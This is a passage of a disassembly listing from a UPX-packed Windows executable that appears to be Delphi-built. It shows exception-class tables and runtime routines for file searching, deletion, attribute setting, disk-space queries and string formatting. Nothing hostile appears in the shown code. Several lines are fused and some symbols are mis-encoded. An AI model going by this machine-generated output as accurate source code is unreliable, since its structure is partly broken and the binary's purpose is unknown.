dd 10h, 405CD8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
aEdivbyzeror@ db 0Ah ; DATA XREF: UPX0:00405D50�o
; UPX0:off_40B208�o
db 'EDivByZero]@',0
dd 7 dup(0)
dd offset aErangeerror@ ; "\vERangeError,^@"
dd 10h, 405CD8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
aErangeerror@ db 0Bh,'ERangeError,^@',0 ; DATA XREF: UPX0:00405DA8�o
dd 7 dup(0)
dd offset dword_405E2C
dd 10h, 405CD8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_405E2C dd 6E49450Ch, 65764F74h, 6F6C6672h, 408D77h, 405E88h, 7 dup(0)
; DATA XREF: UPX0:00405E00�o
dd offset aEmatherrorrr@ ; "\nEMathError^@"
dd 10h, 405C20h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
aEmatherrorrr@ db 0Ah ; DATA XREF: UPX0:00405E5C�o
db 'EMathError^@',0
dd 7 dup(0)
dd offset aEinvalidopr8_@ ; "\nEInvalidOp8_@"
dd 10h, 405E3Ch, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
aEinvalidopr8_@ db 0Ah ; DATA XREF: UPX0:00405EB4�o
db 'EInvalidOp8_@',0
dd 7 dup(0)
dd offset aEzerodivider_@ ; "\vEZeroDivide_@"
dd 10h, 405E3Ch, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
aEzerodivider_@ db 0Bh,'EZeroDivide_@',0 ; DATA XREF: UPX0:00405F0C�o
dd 7 dup(0)
dd offset aEoverflowlS_@ ; "\tEOverflow_@"
dd 10h, 405E3Ch, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
aEoverflowlS_@ db 9,'EOverflow_@',0 ; DATA XREF: UPX0:00405F64�o
dd 7 dup(0)
dd offset dword_405FE8
dd 10h, 405E3Ch, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_405FE8 dd 6E55450Ah, 66726564h, 90776F6Choff_405FF4 dd offset dword_406040 ; DATA XREF: sub_408008+48�r
dd 7 dup(0)
dd offset dword_406040
dd 10h, 405B10h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 407AD8h, 4028E4h
dword_406040 dd 6E49450Fh, 696C6176h, 696F5064h, 7265746Eh, 40609Ch
; DATA XREF: UPX0:off_405FF4�o
; UPX0:00406014�o
dd 7 dup(0)
dd offset dword_40609C
dd 0Ch, 405AA8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_40609C dd 6E49450Ch, 696C6176h, 73614364h, 408D74hoff_4060AC dd offset dword_4060F8 ; DATA XREF: sub_406454+7�r
; sub_40646C+2D�r
dd 7 dup(0)
dd offset dword_4060F8
dd 0Ch, 405AA8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_4060F8 dd 6F43450Dh, 7265766Eh, 72724574h, 0C08B726Fh ; UPX0:004060CC�o
off_406108 dd offset dword_406154 ; DATA XREF: sub_407D60+122�r
; sub_407D60+17E�r
dd 7 dup(0)
dd offset dword_406154
dd 10h, 405C20h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_406154 dd 63414510h, 73736563h, 6C6F6956h, 6F697461h, 408D6Eh
; DATA XREF: UPX0:off_406108�o
; UPX0:00406128�o
dd 4061B4h, 7 dup(0)
dd offset dword_4061B4
dd 10h, 405C20h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_4061B4 dd 7250450Ah, 6C697669h, 90656765h, 40620Ch, 7 dup(0)
; DATA XREF: UPX0:00406188�o
dd offset dword_40620C
dd 10h, 405C20h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_40620C dd 7453450Eh, 4F6B6361h, 66726576h, 90776F6Ch, 406268h
; DATA XREF: UPX0:004061E0�o
dd 7 dup(0)
dd offset aEcontrolclB@ ; "\tEControlCb@"
dd 10h, 405C20h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
aEcontrolclB@ db 9,'EControlCb@',0 ; DATA XREF: UPX0:0040623C�o
dd 7 dup(0)
dd offset dword_4062C0
dd 0Ch, 405AA8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_4062C0 dd 6156450Dh, 6E616972h, 72724574h, 0C08B726Fhoff_4062D0 dd offset dword_40631C ; DATA XREF: sub_407BC8+72�r
dd 7 dup(0)
dd offset dword_40631C
dd 0Ch, 405AA8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_40631C dd 73414510h, 74726573h, 466E6F69h, 656C6961h, 408D64h
; DATA XREF: UPX0:off_4062D0�o
; UPX0:004062F0�o
off_406330 dd offset dword_40637C ; DATA XREF: sub_407CA0+18�r
dd 7 dup(0)
dd offset dword_40637C
dd 0Ch, 405AA8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_40637C dd 6241450Eh, 61727473h, 72457463h, 90726F72h, 4063D8h
; DATA XREF: UPX0:off_406330�o
; UPX0:00406350�o
dd 7 dup(0)
dd offset dword_4063D8
dd 0Ch, 405AA8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_4063D8 dd 6E49450Eh, 61436674h, 72457473h, 90726F72h, 406434h
; DATA XREF: UPX0:004063AC�o
dd 7 dup(0)
dd offset dword_406434
dd 0Ch, 405AA8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_406434 dd 61534512h, 61636566h, 78456C6Ch, 74706563h, 906E6F69h
; DATA XREF: UPX0:00406408�o
dd 0FFFFFFFFh, 1
dword_406450 dd 24h
; =============== S U B R O U T I N E =======================================
sub_406454 proc near ; CODE XREF: sub_406F14+4A�p
; sub_407090+45�p
push ebx
mov ebx, eax
mov ecx, ebx
mov dl, 1
mov eax, off_4060AC
call sub_407904
call sub_402C98
pop ebx
retn
sub_406454 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40646C proc near ; CODE XREF: sub_406924+4C�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push ebx
push esi
push edi
mov edi, ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4064BE
push dword ptr fs:[eax]
mov fs:[eax], esp
push esi
push edi
lea edx, [ebp+var_4]
mov eax, ebx
call sub_40478C
mov ecx, [ebp+var_4]
mov dl, 1
mov eax, off_4060AC
call sub_407940
call sub_402C98
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4064C5
loc_4064B5: ; CODE XREF: sub_40646C+57�j
lea eax, [ebp+var_4]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_4064BE: ; DATA XREF: sub_40646C+11�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_4064B5
; ---------------------------------------------------------------------------
loc_4064C5: ; CODE XREF: sub_40646C+51�j
; DATA XREF: sub_40646C+44�o
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_40646C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4064CC proc near ; CODE XREF: sub_40A5A0+E1�p
push ebx
push esi
push edi
mov edi, edx
mov esi, eax
mov eax, esi
call sub_403424
mov ebx, eax
mov eax, edi
mov edx, ebx
call sub_403624
mov edx, esi
mov esi, [edi]
test ebx, ebx
jz short loc_406502
loc_4064ED: ; CODE XREF: sub_4064CC+34�j
mov al, [edx]
cmp al, 41h
jb short loc_4064F9
cmp al, 5Ah
ja short loc_4064F9
add al, 20h
loc_4064F9: ; CODE XREF: sub_4064CC+25�j
; sub_4064CC+29�j
mov [esi], al
inc edx
inc esi
dec ebx
test ebx, ebx
jnz short loc_4064ED
loc_406502: ; CODE XREF: sub_4064CC+1F�j
pop edi
pop esi
pop ebx
retn
sub_4064CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_406508 proc near ; CODE XREF: sub_4073B0+3E�p
; sub_407428+34�p ...
var_8 = dword ptr -8
push ebx
push ecx
mov ebx, edx
mov edx, esp
call sub_4026C0
cmp [esp+8+var_8], 0
jz short loc_40651B
mov eax, ebx
loc_40651B: ; CODE XREF: sub_406508+F�j
pop edx
pop ebx
retn
sub_406508 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406520 proc near ; CODE XREF: sub_40A848+377�p
push ebx
push esi
push edi
mov edi, edx
mov esi, eax
xor ebx, ebx
push edi
mov eax, esi
call sub_403534
push eax
call sub_405738 ; SetFileAttributesA
test eax, eax
jnz short loc_406542
call sub_4056E8 ; RtlGetLastWin32Error
mov ebx, eax
loc_406542: ; CODE XREF: sub_406520+19�j
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_406520 endp
; =============== S U B R O U T I N E =======================================
sub_406548 proc near ; CODE XREF: sub_4065AC+2C�p
; sub_4065FC+16�p
var_C = byte ptr -0Ch
push ebx
add esp, 0FFFFFFF8h
mov ebx, eax
jmp short loc_406568
; ---------------------------------------------------------------------------
loc_406550: ; CODE XREF: sub_406548+26�j
lea eax, [ebx+18h]
push eax
mov eax, [ebx+14h]
push eax
call sub_4056C0 ; FindNextFileA
test eax, eax
jnz short loc_406568
call sub_4056E8 ; RtlGetLastWin32Error
jmp short loc_4065A7
; ---------------------------------------------------------------------------
loc_406568: ; CODE XREF: sub_406548+6�j
; sub_406548+17�j
mov eax, [ebx+18h]
and eax, [ebx+10h]
jnz short loc_406550
push esp
lea eax, [ebx+2Ch]
push eax
call sub_4056A8 ; FileTimeToLocalFileTime
push ebx
lea eax, [ebx+2]
push eax
lea eax, [esp+14h+var_C]
push eax
call sub_4056A0 ; FileTimeToDosDateTime
mov eax, [ebx+38h]
mov [ebx+4], eax
mov eax, [ebx+18h]
mov [ebx+8], eax
lea eax, [ebx+0Ch]
lea edx, [ebx+44h]
mov ecx, 104h
call sub_4033F8
xor eax, eax
loc_4065A7: ; CODE XREF: sub_406548+1E�j
pop ecx
pop edx
pop ebx
retn
sub_406548 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4065AC proc near ; CODE XREF: sub_40A848+84�p
push ebx
push esi
push edi
mov ebx, ecx
mov edi, eax
not edx
and edx, 1Eh
mov [ebx+10h], edx
lea eax, [ebx+18h]
push eax
mov eax, edi
call sub_403534
push eax
call sub_4056B8 ; FindFirstFileA
mov esi, eax
mov [ebx+14h], esi
cmp esi, 0FFFFFFFFh
jz short loc_4065EC
mov eax, ebx
call sub_406548
mov esi, eax
test esi, esi
jz short loc_4065F3
mov eax, ebx
call sub_406620
jmp short loc_4065F3
; ---------------------------------------------------------------------------
loc_4065EC: ; CODE XREF: sub_4065AC+28�j
call sub_4056E8 ; RtlGetLastWin32Error
mov esi, eax
loc_4065F3: ; CODE XREF: sub_4065AC+35�j
; sub_4065AC+3E�j
mov eax, esi
pop edi
pop esi
pop ebx
retn
sub_4065AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4065FC proc near ; CODE XREF: sub_40A848+31B�p
push ebx
mov ebx, eax
lea eax, [ebx+18h]
push eax
mov eax, [ebx+14h]
push eax
call sub_4056C0 ; FindNextFileA
test eax, eax
jz short loc_406619
mov eax, ebx
call sub_406548
pop ebx
retn
; ---------------------------------------------------------------------------
loc_406619: ; CODE XREF: sub_4065FC+12�j
call sub_4056E8 ; RtlGetLastWin32Error
pop ebx
retn
sub_4065FC endp
; =============== S U B R O U T I N E =======================================
sub_406620 proc near ; CODE XREF: sub_4065AC+39�p
; sub_40A848+33D�p
push ebx
mov ebx, eax
mov eax, [ebx+14h]
cmp eax, 0FFFFFFFFh
jz short loc_406638
push eax
call sub_4056B0 ; FindClose
mov dword ptr [ebx+14h], 0FFFFFFFFh
loc_406638: ; CODE XREF: sub_406620+9�j
pop ebx
retn
sub_406620 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40663C proc near ; CODE XREF: sub_40A5A0+198�p
; sub_40A5A0+1A1�p ...
push ebx
mov ebx, eax
mov eax, ebx
call sub_403534
push eax
call sub_405690 ; DeleteFileA
neg eax
sbb eax, eax
neg eax
pop ebx
retn
sub_40663C endp
; =============== S U B R O U T I N E =======================================
sub_406654 proc near ; CODE XREF: sub_4097B8+11�p
; sub_4097B8+2E�p
push ebx
push esi
push edi
mov esi, eax
mov eax, esi
call sub_403424
mov ebx, eax
test ebx, ebx
jz short loc_40667A
lea edi, [esi+ebx-1]
mov edx, ebx
mov eax, esi
call sub_408210
cmp al, 2
jnz short loc_40667C
dec edi
jmp short loc_40667C
; ---------------------------------------------------------------------------
loc_40667A: ; CODE XREF: sub_406654+10�j
xor edi, edi
loc_40667C: ; CODE XREF: sub_406654+21�j
; sub_406654+24�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_406654 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_406684 proc near ; CODE XREF: sub_4066D4+E�p
; sub_40670C+E�p
push ebx
push esi
push edi
push ebp
mov esi, edx
mov ebx, eax
mov eax, esi
call sub_403424
mov edi, eax
mov eax, ebx
call sub_403534
mov ebp, eax
test edi, edi
jle short loc_4066CA
loc_4066A2: ; CODE XREF: sub_406684+44�j
mov bl, [esi+edi-1]
test bl, bl
jz short loc_4066C5
mov edx, ebx
mov eax, ebp
call sub_406904
test eax, eax
jz short loc_4066C5
mov edx, edi
mov eax, esi
call sub_408210
cmp al, 2
jnz short loc_4066CA
dec edi
loc_4066C5: ; CODE XREF: sub_406684+24�j
; sub_406684+31�j
dec edi
test edi, edi
jg short loc_4066A2
loc_4066CA: ; CODE XREF: sub_406684+1C�j
; sub_406684+3E�j
mov eax, edi
pop ebp
pop edi
pop esi
pop ebx
retn
sub_406684 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4066D4 proc near ; CODE XREF: sub_407D60+CC�p
push ebx
push esi
push edi
mov edi, edx
mov ebx, eax
mov edx, ebx
mov eax, offset dword_406708
call sub_406684
mov esi, eax
push edi
lea edx, [esi+1]
mov ecx, 7FFFFFFFh
mov eax, ebx
call sub_403540
pop edi
pop esi
pop ebx
retn
sub_4066D4 endp
; ---------------------------------------------------------------------------
align 10h
dd 0FFFFFFFFh, 2
dword_406708 dd 3A5Ch
; =============== S U B R O U T I N E =======================================
sub_40670C proc near ; CODE XREF: sub_40A848+14C�p
push ebx
push esi
push edi
mov edi, edx
mov esi, eax
mov edx, esi
mov eax, offset dword_406750
call sub_406684
mov ebx, eax
test ebx, ebx
jle short loc_40673D
cmp byte ptr [esi+ebx-1], 2Eh
jnz short loc_40673D
push edi
mov ecx, 7FFFFFFFh
mov edx, ebx
mov eax, esi
call sub_403540
jmp short loc_406744
; ---------------------------------------------------------------------------
loc_40673D: ; CODE XREF: sub_40670C+17�j
; sub_40670C+1E�j
mov eax, edi
call sub_4031C8
loc_406744: ; CODE XREF: sub_40670C+2F�j
pop edi
pop esi
pop ebx
retn
sub_40670C endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 3
dword_406750 dd 3A5C2Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406754 proc near ; DATA XREF: sub_408778+2A�o
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_406764
xor eax, eax
loc_406764: ; CODE XREF: sub_406754+C�j
lea edx, [ebp+var_10]
push edx
lea edx, [ebp+var_C]
push edx
lea edx, [ebp+var_8]
push edx
lea edx, [ebp+var_4]
push edx
push eax
call sub_4056D8 ; GetDiskFreeSpaceA
mov ebx, eax
mov eax, [ebp+var_4]
imul [ebp+var_8]
xor edx, edx
mov [ebp+var_18], eax
mov [ebp+var_14], edx
mov eax, [ebp+var_C]
xor edx, edx
push edx
push eax
mov eax, [ebp+var_18]
mov edx, [ebp+var_14]
call sub_405104
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov [ecx+4], edx
mov eax, [ebp+var_10]
xor edx, edx
push edx
push eax
mov eax, [ebp+var_18]
mov edx, [ebp+var_14]
call sub_405104
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov [ecx+4], edx
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_406754 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067C8 proc near ; CODE XREF: sub_40A848+11B�p
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov si, word ptr [ebp+var_4+2]
mov ecx, esi
and cx, 1Fh
movzx ebx, word ptr [ebp+var_4+2]
mov edx, ebx
shr edx, 5
and dx, 0Fh
mov eax, ebx
shr eax, 9
add ax, 7BCh
call sub_407090
fstp [ebp+var_18]
wait
push 0
mov cx, word ptr [ebp+var_4]
and cx, 1Fh
add ecx, ecx
movzx edi, word ptr [ebp+var_4]
mov edx, edi
shr edx, 5
and dx, 3Fh
mov eax, edi
shr eax, 0Bh
call sub_406F14
fadd [ebp+var_18]
fstp [ebp+var_10]
wait
fld [ebp+var_10]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4067C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_406834 proc near ; CODE XREF: sub_406D94+E�p
; sub_407704+BD�p ...
mov edx, edi
mov edi, eax
mov ecx, 0FFFFFFFFh
xor al, al
repne scasb
mov eax, 0FFFFFFFEh
sub eax, ecx
mov edi, edx
retn
sub_406834 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40684C proc near ; CODE XREF: sub_406924+2B�p
push esi
push edi
mov esi, edx
mov edi, eax
mov edx, ecx
cmp edi, esi
ja short loc_406869
jz short loc_406885
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_406869: ; CODE XREF: sub_40684C+A�j
lea esi, [esi+ecx-1]
lea edi, [edi+ecx-1]
and ecx, 3
std
rep movsb
sub esi, 3
sub edi, 3
mov ecx, edx
shr ecx, 2
rep movsd
cld
loc_406885: ; CODE XREF: sub_40684C+C�j
pop edi
pop esi
retn
sub_40684C endp
; =============== S U B R O U T I N E =======================================
sub_406888 proc near ; CODE XREF: sub_407704+91�p
push edi
push esi
push ebx
mov esi, eax
mov edi, edx
mov ebx, ecx
xor al, al
test ecx, ecx
jz short loc_40689C
repne scasb
jnz short loc_40689C
inc ecx
loc_40689C: ; CODE XREF: sub_406888+D�j
; sub_406888+11�j
sub ebx, ecx
mov edi, esi
mov esi, edx
mov edx, edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
stosb
mov eax, edx
pop ebx
pop esi
pop edi
retn
sub_406888 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4068BC proc near ; CODE XREF: sub_4074D8+101�p
; sub_4074D8+127�p ...
push edi
push esi
push ebx
mov edi, edx
mov esi, eax
mov ebx, ecx
xor eax, eax
or ecx, ecx
jz short loc_4068FD
repne scasb
sub ebx, ecx
mov ecx, ebx
mov edi, edx
xor edx, edx
loc_4068D5: ; CODE XREF: sub_4068BC+3F�j
repe cmpsb
jz short loc_4068FD
mov al, [esi-1]
cmp al, 61h
jb short loc_4068E9
cmp al, 7Ah
ja short loc_4068E9
sub al, 20h
loc_4068E9: ; CODE XREF: sub_4068BC+23�j
; sub_4068BC+28�j
mov dl, [edi-1]
cmp dl, 61h
jb short loc_4068F9
cmp dl, 7Ah
ja short loc_4068F9
sub dl, 20h
loc_4068F9: ; CODE XREF: sub_4068BC+33�j
; sub_4068BC+38�j
sub eax, edx
jz short loc_4068D5
loc_4068FD: ; CODE XREF: sub_4068BC+D�j
; sub_4068BC+1B�j
pop ebx
pop esi
pop edi
retn
sub_4068BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_406904 proc near ; CODE XREF: sub_406684+2A�p
; sub_4082E8+B�p ...
push edi
push eax
mov edi, eax
mov ecx, 0FFFFFFFFh
xor al, al
repne scasb
not ecx
pop edi
mov al, dl
repne scasb
mov eax, 0
jnz short loc_406922
mov eax, edi
dec eax
loc_406922: ; CODE XREF: sub_406904+19�j
pop edi
retn
sub_406904 endp
; =============== S U B R O U T I N E =======================================
sub_406924 proc near ; CODE XREF: sub_406AC7+7A�p
var_34 = byte ptr -34h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFD8h
mov ebx, ecx
mov esi, edx
mov edi, eax
cmp ebx, 1Fh
jbe short loc_40693A
mov ebx, 1Fh
loc_40693A: ; CODE XREF: sub_406924+F�j
mov edx, ebx
dec edx
mov eax, esi
call sub_408234
cmp al, 1
jnz short loc_406949
dec ebx
loc_406949: ; CODE XREF: sub_406924+22�j
mov eax, esp
mov ecx, ebx
mov edx, esi
call sub_40684C
mov [esp+ebx+34h+var_34], 0
mov eax, esp
mov [esp+34h+var_14], eax
mov [esp+34h+var_10], 6
lea edx, [esp+34h+var_14]
mov eax, off_40B130[edi*4]
xor ecx, ecx
call sub_40646C
add esp, 28h
pop edi
pop esi
pop ebx
retn
sub_406924 endp
; =============== S U B R O U T I N E =======================================
sub_40697C proc near ; CODE XREF: sub_406AC7+1A5�p
push ebx
push esi
mov esi, edx
mov ebx, eax
mov eax, ebx
mov edx, esi
call sub_404018
pop esi
pop ebx
retn
sub_40697C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406990 proc near ; CODE XREF: sub_40699C+D3�p
push ebx
mov ebx, eax
mov eax, ebx
call sub_4031C8
pop ebx
retn
sub_406990 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40699C proc near ; CODE XREF: sub_406D94+22�p
; sub_406DDC+55�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00406D84 SIZE 0000000F BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFF8Ch
push ebx
xor ebx, ebx
mov [ebp+var_10], ebx
push ebx
push esi
push edi
mov edi, eax
mov esi, ecx
add ecx, [ebp+arg_8]
mov [ebp+var_4], edi
xor eax, eax
mov [ebp+var_8], eax
mov [ebp+var_C], eax
mov [ebp+var_10], eax
loc_4069C0: ; CODE XREF: sub_40699C+DD�j
or edx, edx
jz short loc_4069D2
loc_4069C4: ; CODE XREF: sub_40699C+34�j
cmp esi, ecx
jz short loc_4069D2
lodsb
cmp al, 25h
jz short loc_4069DC
loc_4069CE: ; CODE XREF: sub_40699C+48�j
stosb
dec edx
jnz short loc_4069C4
loc_4069D2: ; CODE XREF: sub_40699C+26�j
; sub_40699C+2A�j ...
mov eax, edi
sub eax, [ebp+var_4]
jmp loc_406D84
; ---------------------------------------------------------------------------
loc_4069DC: ; CODE XREF: sub_40699C+30�j
cmp esi, ecx
jz short loc_4069D2
lodsb
cmp al, 25h
jz short loc_4069CE
lea ebx, [esi-2]
mov [ebp+var_14], ebx
loc_4069EC: ; CODE XREF: sub_40699C+6F�j
mov [ebp+var_15], al
cmp al, 2Dh
jnz short loc_4069F9
cmp esi, ecx
jz short loc_4069D2
lodsb
loc_4069F9: ; CODE XREF: sub_40699C+56�j
call sub_406A7E
cmp al, 3Ah
jnz short loc_406A0D
mov [ebp+var_8], ebx
cmp esi, ecx
jz short loc_4069D2
lodsb
jmp short loc_4069EC
; ---------------------------------------------------------------------------
loc_406A0D: ; CODE XREF: sub_40699C+65�j
mov [ebp+var_1C], ebx
mov ebx, 0FFFFFFFFh
cmp al, 2Eh
jnz short loc_406A24
cmp esi, ecx
jz short loc_4069D2
lodsb
call sub_406A7E
loc_406A24: ; CODE XREF: sub_40699C+7C�j
mov [ebp+var_20], ebx
mov [ebp+var_24], esi
push ecx
push edx
call sub_406AC7
pop edx
mov ebx, [ebp+var_1C]
sub ebx, ecx
jnb short loc_406A3B
xor ebx, ebx
loc_406A3B: ; CODE XREF: sub_40699C+9B�j
cmp [ebp+var_15], 2Dh
jnz short loc_406A4B
sub edx, ecx
jnb short loc_406A49
add ecx, edx
xor edx, edx
loc_406A49: ; CODE XREF: sub_40699C+A7�j
rep movsb
loc_406A4B: ; CODE XREF: sub_40699C+A3�j
xchg ecx, ebx
sub edx, ecx
jnb short loc_406A55
add ecx, edx
xor edx, edx
loc_406A55: ; CODE XREF: sub_40699C+B3�j
mov al, 20h
rep stosb
xchg ecx, ebx
sub edx, ecx
jnb short loc_406A63
add ecx, edx
xor edx, edx
loc_406A63: ; CODE XREF: sub_40699C+C1�j
rep movsb
cmp [ebp+var_C], 0
jz short loc_406A75
push edx
lea eax, [ebp+var_C]
call sub_406990
pop edx
loc_406A75: ; CODE XREF: sub_40699C+CD�j
pop ecx
mov esi, [ebp+var_24]
jmp loc_4069C0
sub_40699C endp
; =============== S U B R O U T I N E =======================================
sub_406A7E proc near ; CODE XREF: sub_40699C:loc_4069F9�p
; sub_40699C+83�p
xor ebx, ebx
cmp al, 2Ah
jz short loc_406AA7
loc_406A85: ; CODE XREF: sub_406A7E+21�j
cmp al, 30h
jb short locret_406AC6
cmp al, 39h
ja short locret_406AC6
imul ebx, 0Ah
sub al, 30h
movzx eax, al
add ebx, eax
cmp esi, ecx
jz short loc_406AA1
lodsb
jmp short loc_406A85
; ---------------------------------------------------------------------------
loc_406AA1: ; CODE XREF: sub_406A7E+1E�j
; sub_406A7E+45�j
pop eax
jmp loc_4069D2
; ---------------------------------------------------------------------------
loc_406AA7: ; CODE XREF: sub_406A7E+5�j
mov eax, [ebp-8]
cmp eax, [ebp+8]
ja short loc_406AC1
inc dword ptr [ebp-8]
mov ebx, [ebp+0Ch]
cmp byte ptr [ebx+eax*8+4], 0
mov ebx, [ebx+eax*8]
jz short loc_406AC1
xor ebx, ebx
loc_406AC1: ; CODE XREF: sub_406A7E+2F�j
; sub_406A7E+3F�j
cmp esi, ecx
jz short loc_406AA1
lodsb
locret_406AC6: ; CODE XREF: sub_406A7E+A�j
; sub_406A7E+F�j
retn
sub_406A7E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_406AC7 proc near ; CODE XREF: sub_40699C+90�p
; FUNCTION CHUNK AT 00406BE2 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 00406C49 SIZE 00000130 BYTES
and al, 0DFh
mov cl, al
mov eax, 1
mov ebx, [ebp-8]
cmp ebx, [ebp+8]
ja short loc_406B34
inc dword ptr [ebp-8]
mov esi, [ebp+0Ch]
lea esi, [esi+ebx*8]
mov eax, [esi]
movzx ebx, byte ptr [esi+4]
jmp off_406AEE[ebx*4]
; ---------------------------------------------------------------------------
off_406AEE dd offset loc_406BE2 ; DATA XREF: sub_406AC7+20�r
dd offset loc_406B32
dd offset loc_406C49
dd offset loc_406D07
dd offset loc_406C79
dd offset loc_406CE9
dd offset loc_406CC9
dd offset loc_406B32
dd offset loc_406B32
dd offset loc_406B32
dd offset loc_406C8A
dd offset loc_406CAD
dd offset loc_406D03
dd offset loc_406C58
dd offset loc_406B32
dd offset loc_406C91
dd offset loc_406B46
; ---------------------------------------------------------------------------
loc_406B32: ; CODE XREF: sub_406AC7+20�j
; sub_406AC7+99�j ...
xor eax, eax
loc_406B34: ; CODE XREF: sub_406AC7+F�j
call sub_406D79
mov edx, [ebp-14h]
mov ecx, [ebp-24h]
sub ecx, edx
call sub_406924
loc_406B46: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7+67�o
lea ebx, [ebp-30h]
mov edx, [eax]
mov [ebx], edx
mov edx, [eax+4]
mov [ebx+4], edx
cmp cl, 44h
jz short loc_406B69
cmp cl, 55h
jz short sub_406B87
cmp cl, 58h
jnz short loc_406B32
mov ecx, 10h
jmp short loc_406B8C
; ---------------------------------------------------------------------------
loc_406B69: ; CODE XREF: sub_406AC7+8F�j
test dword ptr [ebx+4], 80000000h
jz short sub_406B87
neg dword ptr [ebx]
